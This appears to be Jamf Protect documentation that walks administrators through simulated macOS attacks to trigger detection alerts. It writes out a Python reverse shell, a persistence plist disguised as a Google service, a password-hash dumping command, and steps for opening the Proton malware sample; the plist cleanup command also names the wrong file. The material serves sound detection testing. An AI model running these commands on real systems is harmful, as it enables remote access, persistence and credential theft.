Threat Detection Tests

Once the Jamf Protect agent is installed on computers, you can test threat detections with the following series of threat simulations. Each simulation targets a built-in Analytic.

Disclaimer:

Some of the tests in this guide require downloading known malware. Please ensure proper precautions are taken when conducting any of the tests. We recommend testing in a controlled environment, segregated from any production or critical infrastructure, and on computers approved for or dedicated to testing malicious software. Jamf does not accept any responsibility or liability for any loss, damage, cost, or expense you might incur as a result of the use of, or reliance upon, the materials which appear in this document or any linked website.

Command and Control (Remote Access) Tools

Command and control (remote access) attacks via a reverse shell is a common technique that establishes a connection between a target computer and an attacker's computer. The attacker's computer, which acts as a server, listens for an incoming connection on a specified port from the target computer. Attackers often use Python to quickly create a reverse shell.

To test Jamf Protect's built-in analytic that monitors for this behavior, do the following:

  1. In Terminal, start a netcat listener on local host port 8080 by executing the following command:
    nc -l 8080
  2. In a separate Terminal window, create a Python reverse shell to connect back to the local host on port 8080 by executing the following command:
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));
    os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

    In the netcat window, a reverse shell should now appear, which should allow you to enter commands with the netcat listener.

  3. Close the netcat window by entering exit.
  4. In Jamf Protect, click Alerts.

A PythonReverseShell entry should appear.

Defense Evasion and Masquerading

Attackers may disguise malware as a persistent service, such as a fake PLIST file.

To test Jamf Protect's built-in analytic that monitors for this behavior, do the following:

  1. Copy a binary to the temporary folder by executing the following command:
    cp /usr/bin/whoami /tmp/test
  2. Create a persistence file for the binary by executing the following command:
    cat >~/Library/LaunchAgents/com.google.analytictest.plist <<EOL

    <?xml version="1.0" encoding="UTF-8"?>

    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">

    <plist version="1.0">
    
<dict>

    <key>Label</key>
    
<string>com.google.test</string>
    
<key>ProgramArguments</key>
    
<array>
    
<string>/tmp/test</string>
    
</array>

    <key>RunAtLoad</key>

    <true/>

    </dict>

    </plist>
    
EOL
  3. In Jamf Protect, click Alerts.
A LaunchAgent, PlistDisguisedAsGoogle entry should display.
Delete the files created in steps 1 and 2 by executing the following commands:
rm /tmp/test
rm ~/Library/LaunchAgents/com.google.test.plist

Credential Access and Dumping

Credential Dumping (also known as "pass-the-hash" or "hash dumping") is a technique used to obtain the hash of a username or password and use it to gain account access.

To test Jamf Protect's built-in Analytic that monitors for this behavior, do the following:

  1. Execute the following command:
    sudo dscl . read /Users/$USER dsAttrTypeNative:ShadowHashData | xxd -p -r | plutil -convert xml1 - -o -
  2. In Jamf Protect, click Alerts.
A Hashdump entry should appear.

Built-In Apple Security Services

Apple's built-in anti-virus application, XProtect, scans a binary before it is launched and blocks identified malware. End users are alerted via a pop-up window, but Jamf Protect also logs XProtect activity for additional visibility.

To test Jamf Protect's built-in analytic that monitors for this behavior, do the following:

Warning:

This tests requires downloading known malware. Make sure you are using a virtual machine to detonate malware used in this test.

  1. On your virtual machine, download Proton from the Objective-See Mac Malware website.
  2. Open the downloaded file. When prompted, enter the following password: infect3d
  3. Open the following folder: Proton/Proton.B
  4. Open handbrake.dmg
    Note:

    Handbrake is a safe application that was once infected by a supply chain attack. This sample is a modified version.

  5. On the virtual machine, confirm that a pop-up window appears that prompts you to eject the DMG.
  6. In Jamf Protect, click Alerts.
On the following should display:
  • On macOS 10.14 or earlier, an XProtect entry should display.

  • On macOS 10.15, a GatekeeperBlocked entry should display.

DNS Redirection and Man in the Middle (MITM) Attacks

Domain Name Service (DNS) redirection (also known as DNS hijacking), is a a type of MITM technique used by attackers to insert themselves into the DNS lookup protocol by changing a user's DNS server settings. Once changed, attackers can manipulate web site traffic by making the web site appear offline or redirecting traffic to a malicious web site instead.

To test Jamf Protect's built-in Analytic that monitors for this behavior, do the following:

  1. In Terminal, execute the following command:
    networksetup -setdnsservers Wi-Fi 8.8.8.8
  2. In Jamf Protect, click Alerts.

A DnsModification entry should appear.

Undo the DNS server change made in step 1 by executing the following command:
networksetup -setdnsservers Wi-Fi "Empty"